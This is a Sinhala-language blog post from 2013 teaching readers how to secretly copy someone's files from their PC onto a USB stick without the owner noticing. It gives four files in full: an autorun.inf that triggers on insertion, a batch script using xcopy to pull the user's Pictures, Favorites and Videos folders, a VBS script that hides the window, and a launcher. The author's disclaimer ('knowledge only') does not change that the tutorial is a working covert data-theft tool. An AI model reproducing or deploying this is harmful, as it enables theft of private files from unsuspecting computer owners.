Saturday, October 19, 2013

PC එකකින් data, usb එකකට උස්සමුද ????????




ඔයාලටත් හිතිල ඇති කාගේ හරි PC එකකින් කාටවත් නොදැනීම DATA උස්සන්න ඇත්නම් කියලා... මුලින්ම කියන්න ඕන මෙක ඉතින් කාටවත් හානියක් කරන්න නම් ගන්න එපා.. මොකද මම කියලා දෙන්නේ දැනුම විතරය.

අවශ්‍යතා: USB එකක් පමණි
 
Notepad.exe open එක කරගන්නකෝ එහෙනම්, හරි ඊට පස්සේ මෙන්න මේ code එක type or copy/paste කරල මෙන්න මේ විදියට save කරගන්න

autorun.inf

[autorun]
icon=drive.ico
open=launch.bat
action=Click OK to Run
shell\open\command=launch.bat


හරි ඒක ඉවරයි තව පාරක් notepad එක open කරගෙන මෙන්න මෙ code එකත් එ වගේමtype කරලා හරි copy/paste කරලා හරි notepad එකට අරගෙන save කරගන්න

File.bat

@echo off
:: variables
/min
SET odrive=%odrive:~0,2%
set backupcmd=xcopy /s /c /d /e /h /i /r /y
echo off
%backupcmd% "%USERPROFILE%\pictures" "%drive%\Data\My pics"
%backupcmd% "%USERPROFILE%\Favorites" "%drive%\Data\Favorites"
%backupcmd% "%USERPROFILE%\videos" "%drive%\Data\vids"
@echo off
cls


හරි ඒ වැඩෙත් ඉවරයි... තව පාරක් notepad එක open කරගෙන මෙන්න මෙ code එකත් එ වගේම type කරලා හරි copy/paste කරලා හරි notepad එකට අරගෙන save කරගන්න

Invisible.vbs

CreateObject("Wscript.Shell").
Run """" & WScript.Arguments(0) & """", 0, False

හරි ඒ වැඩෙත් ඉවරයි... තව පාරක් notepad එක open කරගෙන මෙන්න මෙ code එකත් එ වගේම type කරලා හරි copy/paste කරලා හරි notepad එකට අරගෙන save කරගන්න

Launch.bat

wscript.exe \invisible.vbs file.bat


ඔන්න වැඩේ ගොඩ... මතක තියාගන්න හරියටම මම කියපු නම් වලින්ම මේ file 4ම save කරගන්න

දැන් මේ files 4ම ඔයාලගේ pen එකට copy කරගන්නකෝ එහෙනම්. තව එක පොඩි වැඩක් තියෙනවා... pen එක ඇතුලේ Data කියලා folder එකකුත් ඔයාලා create කරගන්න ඕන. ඒකට තමයි අපි හොරෙන් උස්සන ඒව copy කරගන්නේ.